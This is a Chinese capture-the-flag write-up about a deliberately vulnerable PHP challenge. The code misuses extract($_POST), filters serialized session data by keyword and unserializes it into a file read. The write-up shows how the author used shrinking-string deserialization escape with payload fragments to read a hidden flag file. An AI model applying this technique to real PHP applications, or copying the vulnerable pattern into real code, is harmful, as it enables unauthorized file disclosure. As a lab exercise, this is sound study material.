题目源代码
<?php$function = @$_GET['f'];function filter($img){$filter_arr = array('php','flag','php5','php4','fl1g');
//implode 函数将数组 $filter_arr 中的元素用 | 连接成一个字符串。
// |在正则表达式中表示或的关系,所以连接后的字符串类似于 php|flag|php5|php4|fl1g。
// 前后的 / 表示正则表达式的定界符,末尾的i表示不区分大小写匹配
//最终的效果就是正则表达式匹配字符串中出现的任意一个过滤词$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',$img);
}if($_SESSION){
//unset()销毁整个会话数组unset($_SESSION);
}
//将user会话设置为guest表示当前用户为访客
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;//将 $_POST 数组中的元素提取出来,使其成为单独的变量。
//如果 $_POST 中有一个键为 function 的元素,那么会创建一个名为 $function 的变量
//其值为该元素的值。
extract($_POST);if(!$function){echo '<a href="index.php?f=highlight_file">source_code</a>';
}if(!$_GET['img_path']){$_SESSION['img'] = base64_encode('guest_img.png');
}else{$_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}$serialize_info = filter(serialize($_SESSION));if($function == 'highlight_file'){highlight_file('index.php');
}else if($function == 'phpinfo'){eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){$userinfo = unserialize($serialize_info);echo file_get_contents(base64_decode($userinfo['img']));
}源代码中提示我们在phpinfo里面有好东西,去看看
这个意思也就是说会在php解析完了以后包含d0g3_f1ag.php,大概率flag在这里
先从头捋一下:
在$GET['img_path']不存在的时候---$_SESSION['img']=base64-en("guest_img.png")
正常的逻辑就是,你这里$_SESSION['img']的值是guest_img.png定死了的,不会读取到flag文件
那怎么办呢,有两条路,第一条路是前面POST提交一个img是flag的值【这里提交变量为_SESSION这样进去就变成了$_SESSION就能混进本来的超级全局变量里头去了,好好好这么玩是吧】,第二条路就是利用php的反序列化字符串逃逸减少的情况,将原本的$_SESSION['img']=base64-en("guest_img.png")吞掉(变成前一个键的值),然后后面顺理成章接着我们构造的新的$_SESSION['img']的值
很明显第一条路中后面 $_SESSION['img'] = base64_encode('guest_img.png');还会再赋值一次,这样就覆盖了之前提交的img值,不行,所以利用字符串逃逸减少
先写个序列化php,但是像原来那么写死活编译不出来,应该就是变量名不能是_SESSION的事
这样不对!!
<?php
class _SESSION
{$public img='Z3Vlc3RfaW1nLnBuZw==';//guest_image.png$public user='guest';$public function='show_image';
}
$a=new _SESSION();
echo serialize($a);
?>学习到个新的写法,就是直接写$_SESSION['xxx']
<?php
$_SESSION["user"] = 'kkk';
$_SESSION['function'] = 'show_image';
$_SESSION['img'] = base64_encode('guest_img.png');
echo serialize($_SESSION);//a:3:{s:4:"user";s:3:"kkk";s:8:"function";s:10:"show_image";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
?>(后来发现这里头function的值可以随便取。。。)
就先试试user的值为n*php,function的值为;s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==
原本想这么构造,但是又发现一个很傻的问题就是,序列化前面有三个属性,对应不上
然后改成这样
这样做了还是不行,后来发现好像是顺序错了.......
.....
换个顺序重新来
过滤后的字符串,标蓝的是php以为的user的字符串,标黄的是实际输入的function的值
再将/d0g3_fllllllag编码后提交,长度都是20不用改
拿到flag